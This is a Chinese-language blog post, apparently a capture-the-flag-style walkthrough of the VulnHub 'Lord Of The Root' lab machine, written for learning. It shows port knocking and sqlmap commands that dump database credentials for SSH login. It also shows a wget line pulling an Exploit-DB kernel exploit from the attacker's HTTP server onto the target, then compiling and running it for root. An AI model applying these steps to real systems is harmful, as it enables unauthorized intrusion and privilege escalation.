6-VulnHub-Lord Of The Root 1.0.1

本文介绍了通过VulnHub平台进行的一次网络安全演练,涉及LordOfTheRoot靶机的攻防。首先,通过Port Knocking技术解锁1337端口,接着利用SQLMap进行SQL注入,获取数据库中的用户名和密码。最后,针对Ubuntu系统进行提权操作,成功获取root权限。整个过程展示了信息收集、漏洞利用和提权等关键步骤。
摘要由CSDN通过智能技术生成

VulnHub-Lord Of The Root: 1.0.1

靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/
目标:得到root权限&找到flag.txt
作者:尼德霍格007
时间:2021-7-16

信息收集

扫描目标主机

nmap -sP 192.168.21.0/24

image-20210716194202070

扫描开放端口

nmap -A -p 1-1000 192.168.21.141

image-20210716194306115

看到只开放了22端口,尝试连接一下

image-20210716194747699

easy as 1,2,3

提示敲门程序在运行

发送tcp的数据包分别到这三个端口

nmap -r -Pn -p 1,2,3 192.168.21.141

image-20210716194917389

再次扫描端口

image-20210716195031844

发现开启了1337端口,是个web服务,尝试访问

image-20210716195210315

只有一张图,英文来自指环王,意思是我愿意把魔戒带到MORDOR,访问一下mordor试试

image-20210716200511999

查看源代码

image-20210716200559885

有一串密文,像是base64

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

image-20210716200856656

解密两次得到

/978345210/index.php

是一个路径,访问

image-20210716201007175

获取shell

尝试弱口令登陆失败,就不放图了

不知道用户名和密码的情况下,可以使用SQLMAP注入试一下

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms --dbs

-o:开启所有优化
-u:指定目标URL
–forms:自动判断注入
–dbs:枚举DBMS所有的数据库名称

(有提示y/n时,看不懂默认y就可以或者直接回车)

image-20210716201939786

这里获得了一个Webapp数据库,继续获取Webapp表信息

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp --tables

-D:指定数据库
–tables:列出该数据库所有的表

这里获得了一个Users表

image-20210716202452945

继续对表内容进行信息获取

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp  -T Users --columns

-T:指定表
–columns:列出该表的所有表项

image-20210716203411017

表中有三个字段id,password,和username

继续获取表中详细信息

 sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp  -T Users -C id,username,password --dump

-C:指定列
–dump:转储DBMS的数据库中的表项

image-20210716204654405

得到用户名和密码,使用这些用户名和密码ssh登录

ssh *用户名*@*ip*

最后成功登录

用户名:smeagol

密码:MyPreciousR00t

image-20210716205423038

提权

uname -a查看靶机内核版本和系统版本

image-20210716205721360

在https://www.exploit-db.com/查找可利用漏洞

image-20210716210015319

点击下载按钮把exp文件下载到本地

在kali攻击机用python开启一个简单的http服务

python -m SimpleHTTPServer 6666

image-20210716212156189

把文件下载到靶机

靶机执行

wget http://192.168.21.128:6666/39166.c

编译

gcc 39166.c -o p

-o指定编译后的文件名

给执行权限

chmod +x p

运行

./p

image-20210716212141464

此时可以看到已经是root组的用户了,提权成功

image-20210716211107811

获得flag,任务完成

image-20210716211300998

总结

这次的漏洞复现主要考察了port_knocking、使用sqlmap获取数据库信息和利用ubuntu系统漏洞来提权,难度适中。对我来说,port_knocking是之前没有见到过的,需要多加练习。而且使用sqlmap获取数据库信息和查找系统漏洞进行利用的能力也需要多加锻炼。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼德霍格007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值